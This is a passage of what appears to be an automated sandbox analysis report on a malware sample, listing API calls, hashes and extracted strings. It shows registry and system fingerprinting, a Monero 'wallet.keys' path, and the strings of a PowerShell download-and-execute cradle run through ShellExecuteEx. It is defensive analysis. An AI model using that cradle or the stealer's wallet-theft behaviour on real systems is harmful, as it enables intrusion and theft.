                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DD8426
                                • wsprintfA.USER32 ref: 00DD8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DD847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD8499
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                • RegQueryValueExA.ADVAPI32(00000000,0162DF18,00000000,000F003F,?,00000400), ref: 00DD84EC
                                • lstrlen.KERNEL32(?), ref: 00DD8501
                                • RegQueryValueExA.ADVAPI32(00000000,0162DEA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00DE0B34), ref: 00DD8599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD8608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: c8a9c48200f1fa3ca50462ad6c19b9dd5e4e2e1234e0881534418e5e53394abe
                                • Instruction ID: 1c4f7c620e7f524bde3c719b0e0515c8100a0f173f47d528d4b3a6261ec3d068
                                • Opcode Fuzzy Hash: c8a9c48200f1fa3ca50462ad6c19b9dd5e4e2e1234e0881534418e5e53394abe
                                • Instruction Fuzzy Hash: AA210771A10228ABDB24DB54DC85FE9B3B8FB48700F00C1D9E649A7240DF75AA85CFE4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD76A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD76AB
                                • RegOpenKeyExA.ADVAPI32(80000002,0161C320,00000000,00020119,00000000), ref: 00DD76DD
                                • RegQueryValueExA.ADVAPI32(00000000,0162DFF0,00000000,00000000,?,000000FF), ref: 00DD76FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00DD7708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 8a181af558d72b4418c14b92d342fa7c7a4da8c6b464885bf5777b6524ecb9a8
                                • Instruction ID: e5b7e8a4ebb894c10dbbe7f19389e82a0831791dc213f6b501fa4969c40dec64
                                • Opcode Fuzzy Hash: 8a181af558d72b4418c14b92d342fa7c7a4da8c6b464885bf5777b6524ecb9a8
                                • Instruction Fuzzy Hash: 760162B5B44304FBDB11DBE4DC49F6EB7B8EB48701F108495FA45D7285E6B99A00CB60
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD773B
                                • RegOpenKeyExA.ADVAPI32(80000002,0161C320,00000000,00020119,00DD76B9), ref: 00DD775B
                                • RegQueryValueExA.ADVAPI32(00DD76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00DD777A
                                • RegCloseKey.ADVAPI32(00DD76B9), ref: 00DD7784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: c6df081870a4c7dd907d73d3f37f3eb3601233d3c3a71167bc1df39347b8e530
                                • Instruction ID: 6737330035d9f1e9905c707b8bfb20696ad4b5a2228a4409ef69719b6d96e6b9
                                • Opcode Fuzzy Hash: c6df081870a4c7dd907d73d3f37f3eb3601233d3c3a71167bc1df39347b8e530
                                • Instruction Fuzzy Hash: FA014FB5A40308FBDB11DBE4DC4AFAEB7B8EB48701F004559FA45A7285DAB55A008B61
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                • LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 8121a75f167bbbfa459e6f73f1a01fbd4890bcef21146bd2555fa34905f7a981
                                • Instruction ID: 5a6fc5d962fbb67af0ea112a75bc171ef42a490bf206fe37968031c3f36ae30b
                                • Opcode Fuzzy Hash: 8121a75f167bbbfa459e6f73f1a01fbd4890bcef21146bd2555fa34905f7a981
                                • Instruction Fuzzy Hash: 5E312D74A0020AEFDB14CFA4C899FAEB7B5FF48300F108158E901A7290D779AA41CFA0
                                APIs
                                • lstrcat.KERNEL32(?,0162E338), ref: 00DD47DB
                                  • Part of subcall function 00DD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DD8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4801
                                • lstrcat.KERNEL32(?,?), ref: 00DD4820
                                • lstrcat.KERNEL32(?,?), ref: 00DD4834
                                • lstrcat.KERNEL32(?,0161B838), ref: 00DD4847
                                • lstrcat.KERNEL32(?,?), ref: 00DD485B
                                • lstrcat.KERNEL32(?,0162DB40), ref: 00DD486F
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DD8D90: GetFileAttributesA.KERNEL32(00000000,?,00DC1B54,?,?,00DE564C,?,?,00DE0E1F), ref: 00DD8D9F
                                  • Part of subcall function 00DD4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DD4580
                                  • Part of subcall function 00DD4570: RtlAllocateHeap.NTDLL(00000000), ref: 00DD4587
                                  • Part of subcall function 00DD4570: wsprintfA.USER32 ref: 00DD45A6
                                  • Part of subcall function 00DD4570: FindFirstFileA.KERNEL32(?,?), ref: 00DD45BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: df7db501a934cfc70cb0691d82a4cb47618ede852ad2636fdee9b8fd39f393e9
                                • Instruction ID: 93e20a77b76f2cc515c9732941d615f6e87cac0541c7c8a82da78a57f6e852a0
                                • Opcode Fuzzy Hash: df7db501a934cfc70cb0691d82a4cb47618ede852ad2636fdee9b8fd39f393e9
                                • Instruction Fuzzy Hash: EC3162B6900318A7CB21F7A0DC85EED737CAB58700F404589B39597181EE75D7898FB5
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00DD2D85
                                Strings
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00DD2D04
                                • ')", xrefs: 00DD2CB3
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00DD2CC4
                                • <, xrefs: 00DD2D39
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 321c1bffd88fa873722e47c5b5846dbbf9627179dde1fab58490a0fc8cffb179
                                • Instruction ID: 486ec9d42e33ee01146ccf7213c9dcd36cfc61968174b62ada6198f8a196ddfa
                                • Opcode Fuzzy Hash: 321c1bffd88fa873722e47c5b5846dbbf9627179dde1fab58490a0fc8cffb179
                                • Instruction Fuzzy Hash: 4E41FF71C402589ADB15FFA4C892BEDBB78EF10300F40811AF406A7291EF746A4ADFB5
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00DC9F41
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: 5fbd268bc35fc31e32aa78038533b226a71114ca0ad41c43375ed80106f023b0
                                • Instruction ID: 88e9baf9a589216688f33d2d4413bf42c3b8098e1191da167f0375d92dee0b58
                                • Opcode Fuzzy Hash: 5fbd268bc35fc31e32aa78038533b226a71114ca0ad41c43375ed80106f023b0
                                • Instruction Fuzzy Hash: F2611E71A10259AFDB24EFA8CC96FED7775EF45344F008018F90A5B285DB74AA06CB72
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,0162DCC0,00000000,00020119,?), ref: 00DD40F4
                                • RegQueryValueExA.ADVAPI32(?,0162E398,00000000,00000000,00000000,000000FF), ref: 00DD4118
                                • RegCloseKey.ADVAPI32(?), ref: 00DD4122
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD4147
                                • lstrcat.KERNEL32(?,0162E458), ref: 00DD415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: ea5847b879461ddbbbab0580cf1914816104f6779f095377644132e8fa7e9f11
                                • Instruction ID: f07c42c3cfb34be11742d081a4188cca8153af88731bfd6d28df22b0d86f2970
                                • Opcode Fuzzy Hash: ea5847b879461ddbbbab0580cf1914816104f6779f095377644132e8fa7e9f11
                                • Instruction Fuzzy Hash: B341BBB6D10208ABDB25EBA0DC46FFE733DE788300F00455DB65557185EA769B888BB1
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00DD696C
                                • sscanf.NTDLL ref: 00DD6999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DD69B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DD69C0
                                • ExitProcess.KERNEL32 ref: 00DD69DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 77d8d5416ba1b03039e18664af8234d3755fcb29bd75558e010534cbe31e1c02
                                • Instruction ID: ddfaaedb228e3b60f3eb20f09b05c1e55c47c68a3d15fb8a7bdb7981c2d50ccb
                                • Opcode Fuzzy Hash: 77d8d5416ba1b03039e18664af8234d3755fcb29bd75558e010534cbe31e1c02
                                • Instruction Fuzzy Hash: 1D21CB75D14208ABCF15EFE8D945AEEB7B9FF48300F04852AE506E3244EB359605CBA9
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD7E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,0161BEF8,00000000,00020119,?), ref: 00DD7E5E
                                • RegQueryValueExA.ADVAPI32(?,0162DAA0,00000000,00000000,000000FF,000000FF), ref: 00DD7E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00DD7E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: ffb34ba19e17accbde09e164656cbaa1b10cb8b24e4d71d11c932c4c9b6f9e21
                                • Instruction ID: ce48b1fef322ab53c3c4327c984cb3f97bdefe1dc3c1c3021ec16c6b5b1029cb
                                • Opcode Fuzzy Hash: ffb34ba19e17accbde09e164656cbaa1b10cb8b24e4d71d11c932c4c9b6f9e21
                                • Instruction Fuzzy Hash: E7118CB1A44309EBD710CB94D849FBBBBB8FB48B10F10415AF655A7284D77959008BB0
                                APIs
                                • StrStrA.SHLWAPI(0162DF78,?,?,?,00DD140C,?,0162DF78,00000000), ref: 00DD926C
                                • lstrcpyn.KERNEL32(0100AB88,0162DF78,0162DF78,?,00DD140C,?,0162DF78), ref: 00DD9290
                                • lstrlen.KERNEL32(?,?,00DD140C,?,0162DF78), ref: 00DD92A7
                                • wsprintfA.USER32 ref: 00DD92C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
